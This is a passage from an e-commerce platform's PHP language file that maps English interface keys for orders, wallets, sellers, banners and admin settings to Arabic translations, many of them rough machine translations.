'You can get brand and category id from their list' => 'يمكنك الحصول على معرف العلامة التجارية والفئة من قائمتهم', 'You can get brand and category id from their list please input the right ids' => 'يمكنك الحصول على معرف العلامة التجارية والفئة من قائمتهم ، يرجى إدخال المعرفات الصحيحة', 'You can upload your product images in product folder from gallery' => 'يمكنك تحميل صور المنتج الخاصة بك في مجلد المنتج من المعرض', 'You can upload your product images in product folder from gallery and copy image`s path' => 'يمكنك تحميل صور المنتج الخاصة بك في مجلد المنتج من المعرض ونسخ مسار الصورة', 'You have new order Check Please' => 'لديك فحص طلب جديد من فضلك', 'You order has been confirmed and will be shipped according to the method you selected!' => 'تم تأكيد الطلب وسيتم شحنه وفقًا للطريقة التي حددتها!', 'You will not be able to revert this' => 'لن تكون قادرًا على إعادة هذا', 'You wont be able to revert this!' => 'لن تكون قادرًا على إعادة هذا!', 'You_May_Also_Like' => 'ربما يعجبك أيضا', 'You_can_check_our' => 'يمكنك التحقق من', 'You_can_track_your_order_by_clicking_the_below_button' => 'يمكنك تتبع طلبك بالنقر فوق الزر أدناه', 'You_cannot_add_product_to_cart_from_this_shop_for_now' => 'لا يمكنك إضافة منتج إلى عربة من هذا المتجر الآن', 'You_want_to_change_refund_status!!' => 'تريد تغيير حالة الاسترداد !!', 'You_want_to_remove_all_items_from_cart!!' => 'تريد إزالة جميع العناصر من العربة !!', 'You_will not_be_able_to_revert_this' => 'لن تكون قادرًا على إعادة هذا', 'You_will_not_be_able_to_revert_this' => 'لن تكون قادرًا على إعادة هذا', 'You_will_not_be_able_to_revert_this!' => 'لن تكون قادرًا على إعادة هذا!', 'You_wont_be_able_to_revert_this!' => 'لن تكون قادرًا على إعادة هذا!', 'Your Earnings' => 'أرباحك', 'Your Email Address' => 'عنوان بريدك الإلكتروني', 'Your Message Send Successfully' => 'رسالتك ترسل بنجاح', 'Your existing session token does not authorize you any more' => 'الرمز المميز للجلسة الحالي الخاص بك لا يسمح لك بعد الآن', 'Your first name' => 'اسمك الأول', 'Your order ID' => 'معرف طلبك', 'Your subscription successfully done!!' => 'اشتراك الخاص بك بنجاح!', 'Your_Most_Searching' => 'أكثر البحث', 'Your_Order_is_Completed' => 'تم الانتهاء من طلبك', 'Your_Privacy_Matter' => 'مسألة خصوصيتك', 'Your_account_deleted_successfully!!' => 'تم حذف حسابك بنجاح !!', 'Your_order' => 'طلبك', 'Your_order_ID' => 'معرف طلبك', 'Your_password_must_be_at_least_8_characters' => 'يجب أن تكون كلمة المرور الخاصة بك 8 أحرف على الأقل', 'Your_shop_address' => 'عنوان متجرك', 'Youtube video link' => 'رابط فيديو يوتيوب', 'Z-A' => 'Z-a', 'Z_A' => 'z أ', 'Z_to_A' => 'z إلى أ', 'Z_to_A_Order' => 'z لطلب', 'Zip Code' => 'الرمز البريدي', 'Zip_Code' => 'الرمز البريدي', '[Apple_Deveveloper_Account_Name - Team_ID]' => '[اسم حساب Apple Developer - معرف الفريق]', '[This is the Service Key ID file and also after AuthKey_ that is the Key ID]' => '[هذا هو ملف معرف مفتاح الخدمة وأيضًا بعد Authkey هذا هو معرف المفتاح]', '_Color_Available' => 'اللون المتاح', '_again_ _you_will_see_the_saved_data.' => 'مرة أخرى سترى البيانات المحفوظة.', '_as_the_Digital_Payment_method' => 'كطريقة الدفع الرقمي', '_as_the_SMS_Gateway' => 'كبوابة الرسائل القصيرة', '_pc' => 'الكمبيوتر', '_points_required_to_convert_into_currency' => 'النقاط المطلوبة للتحويل إلى عملة', 'a_test_mail_will_be_send_to_your_email_to' => 'سيتم إرسال بريد الاختبار إلى بريدك الإلكتروني إلى', 'a_test_mail_will_be_sent_to_your_email' => 'سيتم إرسال بريد اختبار إلى بريدك الإلكتروني', 'a_to_z_order' => 'من أجل Z', 'a_z' => 'أ', 'about_Company' => 'عن الشركة', 'about_Our_Company' => 'بالنسبه لشركتنا', 'about_company' => 'عن الشركة', 'about_us' => 'معلومات عنا', 'ac_number' => 'رقم التيار المتردد', 'accept_All_Cookies' => 'قبول جميع ملفات تعريف الارتباط', 'access_denied' => 'تم الرفض', 'access_denied!!' => 'تم الرفض!!', 'access_token' => 'رمز وصول', 'according_to_theme' => 'وفقا للموضوع', 'account&shipping_info' => 'معلومات الحساب والشحن', 'account_&_shipping_info' => 'معلومات الحساب والشحن', 'account_Information' => 'معلومات الحساب', 'account_Number' => 'رقم حساب', 'account_email_not_verified' => 'البريد الإلكتروني لم يتم التحقق منه', 'account_has_been_deleted_you_can_not_change_the_status' => 'تم حذف الحساب لا يمكنك تغيير الحالة', 'account_holder_name' => 'اسم صاحب الحساب', 'account_information' => 'معلومات الحساب', 'account_name' => 'إسم الحساب', 'account_no' => 'حساب لا', 'account_number' => 'رقم حساب', 'account_phone_not_verified' => 'لم يتم التحقق من هاتف الحساب', 'accounts' => 'حسابات', 'action' => 'فعل', 'action_disabled' => 'العمل المعاق', 'activate' => 'تفعيل', 'activate_maintenance_mode' => 'تنشيط وضع الصيانة', 'activated_successfully' => 'تنشيط بنجاح', 'activation failed' => 'فشل التفعيل', 'activation_keys' => 'مفاتيح التنشيط', 'active' => 'نشيط', 'active_Products' => 'المنتجات النشطة', 'active_Status' => 'الحالة النشطة', 'active_products' => 'المنتجات النشطة', 'active_sellers' => 'البائعين النشطين', 'active_status' => 'الحالة النشطة', 'add' => 'يضيف', 'add funds to wallet' => 'أضف أموالًا إلى محفظة', 'add_Address' => 'اضف عنوان', 'add_Delivery_Man' => 'أضف رجل التوصيل', 'add_Domain_(For_ex= _demo.6amtech.com)' => 'إضافة المجال (لـ EX=> DEMO.6amtech.com)', 'add_Fields' => 'إضافة الحقول', 'add_Fund' => 'إضافة الصندوق', 'add_Fund_to_Wallet' => 'إضافة صندوق إلى محفظة', 'add_Meta_Image_in' => 'إضافة صورة التعريف في', 'add_New' => 'اضف جديد', 'add_New_Method' => 'أضف طريقة جديدة', 'add_New_Product' => 'أضف منتجًا جديدًا', 'add_New_Seller' => 'أضف بائعًا جديدًا', 'add_Offline_Payment_Method' => 'أضف طريقة الدفع على الإنترنت', 'add_Product' => 'أضف منتج', 'add_Refund_Amount_to_Wallet' => 'أضف مبلغ استرداد إلى محفظة', 'add_Shipping' => 'إضافة الشحن', 'add_a_abel_(Ex= _abc_company)' => 'أضف Abel (على سبيل المثال=> ABC Company)', 'add_a_label_(Ex= _abc_company)' => 'أضف ملصقًا (على سبيل المثال=> ABC Company)', 'add_address' => 'اضف عنوان', 'add_banner' => 'أضف لافتة', 'add_color-wise_product_images_here' => 'أضف صور المنتج الحكيمة هنا', 'add_fund' => 'إضافة الصندوق', 'add_fund_by_admin' => 'إضافة صندوق من قبل المشرف', 'add_fund_by_customer' => 'إضافة صندوق من قبل العميل', 'add_fund_by_from_secured_digital_payment_gateways' => 'أضف صندوقًا من بوابات الدفع الرقمية المضمونة', 'add_fund_to_wallet' => 'إضافة صندوق إلى محفظة', 'add_fund_to_wallet_success' => 'إضافة صندوق لنجاح المحفظة', 'add_main_banner' => 'أضف لافتة رئيسية', 'add_method' => 'أضف الطريقة', 'add_more_for_free_delivery' => 'أضف المزيد للتسليم المجاني', 'add_new' => 'اضف جديد', 'add_new_address' => 'أضف عنوانًا جديدًا', 'add_new_attribute' => 'أضف سمة جديدة', 'add_new_customer' => 'أضف عميلًا جديدًا', 'add_new_delivery_man' => 'أضف رجل توصيل جديد', 'add_new_deliveryman' => 'أضف توصيل جديد', 'add_new_language' => 'أضف لغة جديدة', 'add_new_notification' => 'أضف إشعارًا جديدًا', 'add_new_order_wise_shipping' => 'أضف طلبًا جديدًا شحنًا', 'add_new_product' => 'أضف منتجًا جديدًا', 'add_new_seller' => 'أضف بائعًا جديدًا', 'add_new_ticket' => 'أضف تذكرة جديدة', 'add_order_wise_shipping' => 'أضف طلب الشحن الحكيمة', 'add_popup_banner' => 'إضافة شعار منبثقة', 'add_secondary_banner' => 'أضف لافتة ثانوية', 'add_the_Stock_Quantity_of_this_product_that_will_be_visible_to_customers' => 'أضف كمية الأسهم لهذا المنتج الذي سيكون مرئيًا للعملاء', 'add_the_YouTube_video_link_here._Only_the_YouTube-embedded_link_is_supported' => 'أضف رابط فيديو YouTube هنا. يتم دعم الرابط المدمج على YouTube فقط', 'add_the_discount_amount_in_percentage_or_a_fixed_value_here' => 'أضف مبلغ الخصم بالنسبة المئوية أو قيمة ثابتة هنا', 'add_the_product_search_tag_for_this_product_that_customers_can_use_to_search_quickly' => 'أضف علامة بحث المنتج لهذا المنتج الذي يمكن للعملاء استخدامه للبحث بسرعة', 'add_the_purchase_price_for_this_product' => 'أضف سعر الشراء لهذا المنتج', 'add_to_Cart' => 'أضف إلى السلة', 'add_to_cart' => 'أضف إلى السلة', 'add_to_compare' => 'أضف للمقارنة', 'add_to_wishlist' => 'أضف إلى قائمة الامنيات', 'add_valid_data' => 'إضافة بيانات صالحة', 'add_your_productâs_thumbnail_in' => 'أضف الصورة المصغرة للمنتج', 'added_to_cart_successfully!' => 'إضافة إلى عربة بنجاح!', 'added_via_payment_method' => 'تمت إضافته عبر طريقة الدفع', 'additional' => 'إضافي', 'additional_information' => 'معلومات إضافية', 'addon' => 'اضافه', 'addon_menus' => 'قوائم addon', 'address' => 'عنوان', 'address_added_successfully!' => 'العنوان المضافة بنجاح!', 'address_not_found' => 'لم يتم العثور على العنوان', 'address_type' => 'نوع العنوان', 'addresses' => 'عناوين', 'admin' => 'مسؤل', 'admin wallet histori...' => 'تاريخ محفظة المشرف ...', 'admin wallets' => 'الحافظات الإدارية', 'admin@admin.com' => 'Admin@admin.com', 'admin_Commission' => 'لجنة الإدارة', 'admin_Discount' => 'خصم المسؤول', 'admin_Earning' => 'كسب المسؤول', 'admin_Earning_Report' => 'تقرير كسب المشرف', 'admin_Login_Page' => 'صفحة تسجيل الدخول المشرف', 'admin_Net_Income' => 'صافي الدخل الإداري', 'admin_also_rewards_their_top_customers_with_wallet_money' => 'يكافئ المسؤول أيضًا عملائهم الكبار بأموال محفظة', 'admin_approval_for_products' => 'موافقة المسؤول على المنتجات', 'admin_approval_for_products_updated_successfully!' => 'موافقة المسؤول على المنتجات التي تم تحديثها بنجاح!', 'admin_bearer' => 'حامل المسؤول', 'admin_can_review_the_registration_request_and_approve_or_deny_the_request' => 'يمكن للمسؤول مراجعة طلب التسجيل والموافقة عليه أو رفض الطلب', 'admin_can_set_whether_customers_can_add_money_to_their_wallets_by_enabling_or_disabling_this_button' => 'يمكن للمسؤول تعيين ما إذا كان يمكن للعملاء إضافة أموال إلى محافظهم عن طريق تمكين أو تعطيل هذا الزر', 'admin_can_set_whether_customers_will_get_loyalty_points_by_enabling_or_disabling_this_button' => 'يمكن للمسؤول تعيين ما إذا كان العملاء سيحصلون على نقاط ولاء عن طريق تمكين أو تعطيل هذا الزر', 'admin_can_set_whether_customers_will_get_referral_earnings_by_enabling_or_disabling_this_button' => 'يمكن للمسؤول تعيين ما إذا كان العملاء سيحصلون على أرباح الإحالة عن طريق تمكين أو تعطيل هذا الزر', 'admin_can_set_whether_customers_will_get_refund_amount_to_wallet_by_enabling_or_disabling_this_button' => 'يمكن للمسؤول تعيين ما إذا كان العملاء سيحصلون على مبلغ استرداد إلى محفظة عن طريق تمكين أو تعطيل هذا الزر', 'admin_can_set_whether_deliveryman_needs_to_upload_the_picture_of_delivery_by_enabling_or_disabling_this_button' => 'يمكن للمسؤول تعيين ما إذا كان التسليم يحتاج إلى تحميل صورة التسليم عن طريق تمكين أو تعطيل هذا الزر', 'admin_can_set_whether_wallet_will_be_available_on_customer_profile_by_enabling_or_disabling_this_button' => 'يمكن للمسؤول تعيين ما إذا كانت المحفظة ستكون متاحة على ملف تعريف العميل عن طريق تمكين أو تعطيل هذا الزر', 'admin_commission' => 'لجنة الإدارة', 'admin_discount' => 'خصم المسؤول', 'admin_login_url' => 'url تسجيل الدخول إلى Quarity url', 'admin_net_income' => 'صافي الدخل الإداري', 'admin_or_Employee_Login' => 'تسجيل الدخول المشرف أو الموظف', 'admin_wallet' => 'محفظة المسؤول', 'admin_will_handle_the_shipping_responsibilities_when_you_choose_inhouse_shipping_method' => 'سيتعامل المسؤول مع مسؤوليات الشحن عند اختيار طريقة الشحن Inhouse', 'after_changing_any_theme_in_the_you_will_a_menu_option_with_the_menu_name.' => 'بعد تغيير أي موضوع في خيار القائمة مع اسم القائمة.', 'after_switching_the_theme_a_menu_will_appear_in_the_side_bar_with_the_theme_name_on_it' => 'بعد تبديل القائمة ، ستظهر القائمة في الشريط الجانبي مع اسم السمة عليه', 'after_the_order_is_delivered_total_order_amount_will_be_shown_here' => 'بعد تسليم الطلب ، سيتم عرض إجمالي مبلغ الطلب هنا', 'after_uploading_products_you_need_to_edit_them_and_set_product_images_and_choices.' => 'بعد تحميل المنتجات ، تحتاج إلى تحريرها وتعيين صور وخيارات المنتج.', 'again_click_plus_icon' => 'مرة أخرى انقر فوق أيقونة بالإضافة إلى', 'agent_number' => 'رقم الوكيل', 'alex' => 'أليكس', 'all' => 'الجميع', 'all_Categories' => 'جميع الفئات', 'all_Category' => 'كل الفئة', 'all_Pages_Banner' => 'جميع الصفحات لافتة', 'all_Pages_Banner ' => 'جميع الصفحات لافتة', 'all_Priority' => 'كل الأولوية', 'all_Products' => 'جميع المنتجات', 'all_Sellers' => 'جميع البائعين', 'all_Status' => 'كل الوضع', 'all_Transaction' => 'كل المعاملات', 'all_Transactions' => 'كل الحركات المالية', 'all_brand' => 'جميع العلامات التجارية', 'all_brands' => 'جميع العلامات التجارية', 'all_brands_page' => 'جميع العلامات التجارية صفحة', 'all_cart_product_list' => 'جميع قائمة منتجات العربة', 'all_categories' => 'جميع الفئات', 'all_category' => 'جميع الفئات', 'all_copy_right_reserved_©_2023_' => 'كل نسخة محفوظة  © 2023', 'all_customer' => 'كل العميل', 'all_customers' => 'جميع العملاء', 'all_items_were_not_added_to_cart_as_they_are_currently_unavailable_for_purchase!' => 'لم تتم إضافة جميع العناصر إلى العربة لأنها غير متوفرة حاليًا للشراء!', 'all_product' => 'كل المنتج', 'all_products' => 'جميع المنتجات', 'all_seller' => 'كل البائع', 'all_sellers' => 'جميع البائعين', 'all_shop' => 'كل المتجر', 'all_status' => 'كل الوضع', 'all_store' => 'كل المتجر', 'all_stores' => 'جميع المتاجر', 'all_sub_categories' => 'جميع الفئات الفرعية', 'all_sub_sub_categories' => 'جميع الفئات الفرعية الفرعية', 'all_the_promotional_banners_from_the_website_and_user_app_will_be_clear_once_the_theme_is_changed.' => 'ستكون جميع اللافتات الترويجية من موقع الويب وتطبيق المستخدم واضحًا بمجرد تغيير السمة.', 'all_wishing_product_list' => 'كل ما يتمناه قائمة المنتجات', 'all_your_apps_and_customer_website_will_be_disabled_until_you_turn_this_mode_OFF' => 'سيتم تعطيل جميع تطبيقاتك وموقع العميل على الويب حتى تقوم بإيقاف تشغيل هذا الوضع', 'all_your_data_are_safe' => 'جميع بياناتك آمنة', 'already_Settled' => 'استقر بالفعل', 'already_Withdrawn' => 'تم سحبها بالفعل', 'already_added!' => 'تم الاضافة مسبقا!', 'already_check' => 'تحقق بالفعل', 'already_have_an_account _login.' => 'هل لديك حساب؟ سجل في.', 'already_have_store ' => 'لديك بالفعل متجر', 'amount' => 'كمية', 'amount_can_not_be_negative_or_zero' => 'لا يمكن أن يكون المبلغ سلبيًا أو صفرًا', 'amount_can_not_be_negative_or_zero!' => 'لا يمكن أن يكون المبلغ سلبيًا أو صفرًا!', 'amount_to_be_paid' => 'المبلغ المستحق للدفع', 'an_OTP' => 'OTP', 'analytics' => 'التحليلات', 'analytics_script' => 'سيناريو التحليلات', 'and' => 'و', 'and press' => 'و اضغط', 'and_billing' => 'والفواتير', 'and_enjoy' => 'و استمتع', 'and_press' => 'و اضغط', 'announcement' => 'إعلان', 'announcement_setup' => 'إعداد الإعلان', 'announcements' => 'الإعلانات', 'another_address' => 'عنوان آخر', 'api_ID' => 'معرف API', 'api_Key' => 'مفتاح API', 'api_key' => 'مفتاح API', 'api_secret' => 'سر API', 'app_Download_Link' => 'رابط تنزيل التطبيق', 'app_Settings' => 'إعدادات التطبيقات', 'app_debug' => 'App Debug', 'app_download_info' => 'معلومات تنزيل التطبيق', 'app_mode' => 'وضع التطبيق', 'app_name' => 'اسم التطبيق', 'app_settings' => 'إعدادات التطبيقات', 'app_store_download_link' => 'رابط تنزيل متجر التطبيقات', 'app_url' => 'APP URL', 'apple' => 'تفاحة', 'apple_developer_account_name' => 'اسم حساب مطور Apple', 'apple_store' => 'متجر آبل', 'apply' => 'يتقدم', 'apply_Shop' => 'تطبيق المتجر', 'apply_code' => 'تطبيق الرمز', 'apply_coupon_code' => 'تطبيق رمز القسيمة', 'approval_for_products' => 'موافقة على المنتجات', 'approved' => 'موافقة', 'approved_Products' => 'المنتجات المعتمدة', 'approved_note' => 'ملاحظة معتمدة', 'are_you_sure' => 'هل أنت متأكد', 'are_you_sure ' => 'هل أنت متأكد', 'are_you_sure_Change_this' => 'هل أنت متأكد من تغيير هذا', 'are_you_sure_change_this' => 'هل أنت متأكد من تغيير هذا', 'are_you_sure_delete_this' => 'هل أنت متأكد من حذف هذا', 'are_you_sure_delete_this_banner' => 'هل أنت متأكد من حذف هذه اللافتة', 'are_you_sure_delete_this_brand' => 'هل أنت متأكد من حذف هذه العلامة التجارية', 'are_you_sure_delete_this_most_demanded_product' => 'هل أنت متأكد من حذف هذا المنتج الأكثر طلبًا', 'are_you_sure_delete_this_social_media' => 'هل أنت متأكد من حذف وسائل التواصل الاجتماعي هذه', 'are_you_sure_remove_this_product' => 'هل أنت متأكد من إزالة هذا المنتج', 'are_you_sure_to_delete_this' => 'هل أنت متأكد من حذف هذا', 'are_you_sure_you_want_to_delete_the_addon' => 'هل أنت متأكد أنك تريد حذف الملحق', 'are_you_sure_you_want_to_delete_the_theme' => 'هل أنت متأكد أنك تريد حذف السمة', 'aready_Withdrawn' => 'انسحبت', 'ask_about_this_product' => 'اسأل عن هذا المنتج', 'assign' => 'تعيين', 'attachment' => 'مرفق', 'attribute' => 'يصف', 'attribute_Name' => 'اسم السمة', 'attribute_Setup' => 'إعداد السمة', 'attribute_deleted_successfully' => 'تم حذف السمة بنجاح', 'attribute_list' => 'قائمة السمات', 'attributes' => 'صفات', 'audio' => 'صوتي', 'auth_domain' => 'المجال المصادق', 'auth_key' => 'مفتاح المصادقة', 'authentic_payment' => 'الدفع الأصيل', 'authkey' => 'مفتاح المصادقة', 'authorized_redirect_URIs' => 'uris إعادة التوجيه المعتمدة', 'auto_translate' => 'ترجمة السيارات', 'available' => 'متاح', 'available_from_minimum_purchase' => 'متاح من الحد الأدنى من الشراء', 'available_variations' => 'الاختلافات المتاحة', 'average' => 'متوسط', 'average_Earning_Value' => 'متوسط قيمة الكسب', 'average_Product_Value' => 'متوسط قيمة المنتج', 'average_Ratings' => 'متوسط التقييمات', 'back' => 'خلف', 'back_to_seller_list' => 'العودة إلى قائمة البائع', 'back_to_shipping' => 'العودة إلى الشحن', 'background_color' => 'لون الخلفية', 'balance' => 'توازن', 'bank' => 'بنك', 'bank_Info_View' => 'عرض معلومات البنك', 'bank_Information' => 'المعلومات المصرفية', 'bank_Name' => 'اسم البنك', 'bank_info' => 'معلومات البنك', 'bank_information' => 'المعلومات المصرفية', 'bank_name' => 'اسم البنك', 'banned_seller' => 'بائع محظور', 'banner' => 'لافتة', 'banner about us' => 'لافتة عنا', 'banner cancellation policy' => 'سياسة إلغاء اللافتة', 'banner faq page' => 'صفحة الأسئلة الشائعة لافتة', 'banner privacy policy' => 'سياسة خصوصية لافتة', 'banner refund policy' => 'سياسة استرداد الراية', 'banner return policy' => 'سياسة عودة لافتة', 'banner terms conditions' => 'شروط الشرق', 'banner_URL' => 'عنوان URL لافتة', 'banner_added_successfully' => 'أضاف بانر بنجاح', 'banner_deleted_successfully' => 'تم حذف لافتة بنجاح', 'banner_form' => 'شكل لافتة', 'banner_image' => 'صورة بانر', 'banner_photo' => 'صورة لافتة', 'banner_published_successfully' => 'تم نشر Banner بنجاح', 'banner_table' => 'جدول لافتة', 'banner_type' => 'نوع لافتة', 'banner_unpublished_successfully' => 'لافتة غير منشورة بنجاح', 'banner_update_form' => 'نموذج تحديث لافتة', 'banner_updated_successfully' => 'تم تحديث لافتة بنجاح', 'banner_url' => 'عنوان URL لافتة', 'banners' => 'لافتات', 'barcode' => 'الباركود', 'base_URL_of_the_site_ex= ' => 'عنوان URL الأساسي للموقع EX=>', 'base_url_by_region' => 'Base url by region', 'basic' => 'أساسي', 'basic_Information' => 'معلومات اساسية', 'be_careful_before_you_turn_on/off_maintenance_mode' => 'كن حذرا قبل تشغيل/إيقاف وضع الصيانة', 'be_the_first_one_to_know_about_discounts_offers_and_events' => 'كن أول من يعرف عن عروض الخصومات والأحداث', 'bearer' => 'حامل', 'become_a_seller' => 'كن بائعًا', 'before_delivered_you_need_to_make_payment_status_paid' => 'قبل التسليم ، تحتاج إلى دفع حالة الدفع', 'before_the_seller_confirms_the_order' => 'قبل أن يؤكد البائع الطلب', 'below_Average' => 'أقل من المتوسط', 'best selling' => 'أفضل مبيعات', 'best sellings' => 'أفضل عمليات البلادات', 'best-selling' => 'أفضل مبيعات', 'best_selling' => 'أفضل مبيعات', 'best_selling_product' => 'أفضل منتجات مبيع', 'best_sellings' => 'أفضل عمليات البلادات', 'bestsellings' => 'الأكثر مبيعا', 'billing' => 'الفواتير', 'billing addresses' => 'عناوين الفواتير', 'billing_Section' => 'قسم الفواتير', 'billing_address' => 'عنوان وصول الفواتير', 'billing_input_by_customer' => 'إدخال الفواتير من قبل العميل', 'billing_to' => 'الفواتير ل', 'bkash' => 'بكاش', 'block' => 'حاجز', 'blog' => 'مدونة', 'bonus' => 'علاوة', 'bonus_amount' => 'مبلغ المكافأة', 'bonus_info' => 'معلومات المكافأة', 'bonus_removed_Successfully' => 'مكافأة تمت إزالتها بنجاح', 'bonus_title' => 'عنوان المكافأة', 'bonus_type' => 'نوع المكافأة', 'both_Phone_&_Email_verification_can_not_be_active_at_a_time' => 'لا يمكن أن يكون التحقق من الهاتف والبريد الإلكتروني نشطًا في وقت واحد', 'bottom' => 'قاع', 'branch' => 'فرع', 'branch_Name' => 'اسم الفرع', 'branch_name' => 'اسم الفرع', 'brand' => 'ماركة', 'brand is required!' => 'العلامة التجارية مطلوبة!', 'brand_Add' => 'إضافة العلامة التجارية', 'brand_List' => 'قائمة العلامة التجارية', 'brand_Logo' => 'شعار العلامة التجارية', 'brand_Name' => 'اسم العلامة التجارية', 'brand_Setup' => 'إعداد العلامة التجارية', 'brand_deleted_successfully' => 'تم حذف العلامة التجارية بنجاح', 'brand_list' => 'قائمة العلامة التجارية', 'brand_logo' => 'شعار العلامة التجارية', 'brands' => 'العلامات التجارية', 'bulk_Import' => 'الاستيراد بالجملة', 'bulk_export' => 'التصدير بالجملة', 'bulk_import' => 'الاستيراد بالجملة', 'business' => 'عمل', 'business section' => 'قسم الأعمال', 'business_Information' => 'معلومات العمل', 'business_Setup' => 'إعداد الأعمال', 'business_analytics' => 'تحليل الأعمال', 'business_model' => 'نموذج العمل', 'business_section' => 'قسم الأعمال', 'business_settings' => 'إعدادات الأعمال', 'business_setup' => 'إعداد الأعمال', 'button_admin_can_pause_his_shop_activities_and_his_shop_will_be_shown_as' => 'يمكن أن يتوقف Admin Button عن أنشطة متجره وسيتم عرض متجره على أنه', 'button_to_verify_the_SMTP_connection' => 'زر للتحقق من اتصال SMTP', 'buy_now' => 'اشتري الآن', 'buyer_username' => 'اسم المستخدم المشتري', 'by_Turning_OFF_Picture_Upload_on_Delivery' => 'عن طريق إيقاف تحميل الصورة عند التسليم', 'by_Turning_ON_Guest_Checkout_Mode' => 'عن طريق تشغيل وضع الخروج الضيف', 'by_Turning_ON_Picture_Upload_on_Delivery' => 'عن طريق تشغيل تحميل الصورة عند التسليم', 'by_Turning_Off_Guest_Checkout_Mode' => 'عن طريق إيقاف تشغيل وضع الخروج الضيف', 'by_admin' => 'بواسطة المسؤول', 'by_clicking_sign_up_you_are_agreed_with_our' => 'من خلال النقر على التسجيل ، تم الاتفاق علىك مع', 'by_clicking_sign_up_you_are_agreed_with_our ' => 'من خلال النقر على التسجيل ، تم الاتفاق علىك مع', 'by_review_rating' => 'عن طريق تصنيف المراجعة', 'by_self_delivery_man' => 'بواسطة رجل التسليم الذاتي', 'by_seller' => 'من قبل البائع', 'by_third_party_delivery_service' => 'بواسطة خدمة توصيل الطرف الثالث', 'by_turning_on_the' => 'عن طريق تشغيل', 'by_turning_the' => 'عن طريق تحويل', 'call_us' => 'اتصل بنا', 'callback_URI' => 'رد الاتصال أوري', 'can_email_us_at' => 'يمكن مراسلتنا عبر البريد الإلكتروني على', 'cancel' => 'يلغي', 'cancel_Order' => 'الغاء الطلب', 'cancel_order' => 'الغاء الطلب', 'canceled' => 'ألغيت', 'canceled_Orders' => 'أوامر إلغاء', 'cancellation policy' => 'سياسة الإلغاء', 'cancellation_policy' => 'سياسة الإلغاء', 'cancelled' => 'ألغيت', 'cannot_Use_0_only' => 'لا يمكن استخدام 0 فقط', 'captcha' => 'كابتشا', 'card' => 'بطاقة', 'card_holder_email' => 'البريد الإلكتروني حامل البطاقة', 'card_holder_name' => 'إسم صاحب البطاقة', 'card_number' => 'رقم البطاقة', 'card_nummber' => 'بطاقة nummber', 'card_type' => 'نوع البطاقة', 'cart' => 'عربة التسوق', 'cart shippings' => 'عربة العربة', 'cart_empty' => 'عربة فارغة', 'cart_list' => 'قائمة العربة', 'cart_updated' => 'عربة تحديث', 'carts' => 'عربات', 'cash' => 'نقدي', 'cash on delivery' => 'الدفع عند الاستلام', 'cash_Payment' => 'دفع نقدا', 'cash_Payments' => 'التسديد نقذا', 'cash_on_delivery' => 'الدفع عند الاستلام', 'cash_payment' => 'دفع نقدا', 'cash_payments' => 'التسديد نقذا', 'categories' => 'فئات', 'category' => 'فئة', 'category is required!' => 'اختيار القسم مطلوب!', 'category shipping co...' => 'فئة الشحن شركة ...', 'category wise' => 'فئة الحكمة', 'category_Image' => 'صورة الفئة', 'category_Logo' => 'شعار الفئة', 'category_Name' => 'اسم التصنيف', 'category_Setup' => 'إعداد الفئة', 'category_deleted_successfully.' => 'تم حذف الفئة بنجاح.', 'category_form' => 'نموذج الفئة', 'category_list' => 'قائمة الفئات', 'category_name' => 'اسم التصنيف', 'category_table' => 'جدول الفئة', 'category_tag' => 'علامة الفئة', 'category_wise' => 'فئة الحكمة', 'category_wise_shipping_cost' => 'تكلفة الشحن الحكيمة فئة', 'cccc' => 'CCCC', 'cgbfghnb' => 'cgbebhb', 'change_by' => 'التغيير بواسطة', 'change_order_status' => 'تغيير حالة الطلب', 'change_refund_status' => 'تغيير حالة الاسترداد', 'change_status_to_paid' => 'تغيير الحالة إلى الدفع', 'change_your_password' => 'غير كلمة المرور الخاصة بك', 'change_your_password_in_three_easy_steps.' => 'تغيير كلمة المرور الخاصة بك في ثلاث خطوات سهلة.', 'change_your_profile' => 'تغيير ملف التعريف الخاص بك', 'changed_by' => 'تغيير من قبل', 'changes' => 'التغييرات', 'changing_some_settings_will_take_time_to_show_effect_please_clear_session_or_wait_for_60_minutes_else_browse_from_incognito_mode' => 'سيستغرق تغيير بعض الإعدادات بعض الوقت لإظهار التأثير ، يرجى مسح الجلسة أو الانتظار لمدة 60 دقيقة أخرى للتصفح من وضع التخفي', 'chat' => 'محادثة', 'chat_with_delivery-man' => 'الدردشة مع تسليم رجل', 'chat_with_delivery_man' => 'الدردشة مع رجل التسليم', 'chat_with_deliveryman' => 'الدردشة مع التسليم', 'chat_with_seller' => 'الدردشة مع البائع', 'chatbox' => 'صندوق الدردشه', 'chatting_List' => 'قائمة الدردشة', 'chatting_Page' => 'صفحة الدردشة', 'chattings' => 'الدردشة', 'check' => 'يفحص', 'check in' => 'تحقق في', 'check_All_CartList' => 'تحقق من كل كارستلست', 'check_All_Wishlist' => 'تحقق من كل قائمة الأمنيات', 'check_Minimum_Order_Amount_Requirment' => 'تحقق من الحد الأدنى لمتطلبات مبلغ الطلب', 'check_My_All_Orders' => 'تحقق من كل الطلبات الخاصة بي', 'check_Please' => 'تحقق من فضلك', 'check_all_order' => 'تحقق من كل الطلب', 'check_in_âAccept_the_reCAPTCHA_Terms_of_Serviceâ' => 'تحقق في  اقبل شروط الخدمة recaptcha ', 'check_now' => 'تأكد الان', 'check_orders' => 'تحقق من الطلبات', 'check_please' => 'تحقق من فضلك', 'check_your_email' => 'تحقق من بريدك الالكتروني', 'checkout' => 'الدفع', 'checkout_details' => 'تفاصيل الدفع', 'choice_Title' => 'عنوان الاختيار', 'choose' => 'يختار', 'choose_File' => 'اختر ملف', 'choose_Payment_Method' => 'اختر وسيلة الدفع', 'choose_billing_address' => 'اختر عنوان الفواتير', 'choose_customer' => 'اختر العميل', 'choose_delivery_man' => 'اختر تسليم رجل', 'choose_delivery_type' => 'اختر نوع التسليم', 'choose_environment' => 'اختر البيئة', 'choose_file' => 'اختر ملف', 'choose_payment' => 'اختر الدفع', 'choose_priority' => 'اختر الأولوية', 'choose_priority_number' => 'اختر رقم الأولوية', 'choose_product' => 'اختر المنتج', 'choose_shipping_address' => 'اختر عنوان الشحن', 'choose_shipping_method' => 'اختيار أسلوب الشحن', 'choose_the_appropriate_encryption_method' => 'اختر طريقة التشفير المناسبة', 'choose_updated_file' => 'اختر الملف المحدث', 'city' => 'مدينة', 'clean_database' => 'قاعدة بيانات نظيفة', 'clear' => 'واضح', 'clear_all' => 'امسح الكل', 'clear_cart' => 'عربة واضحة', 'click' => 'انقر', 'click_continue_and_download_the_file_in_device_named_AuthKey_ID.p8_(store_it_safely_and_it_is_used_for_push_notification)' => 'انقر فوق متابعة وتنزيل الملف في الجهاز المسماة Authkey ID.P8 (قم بتخزينه 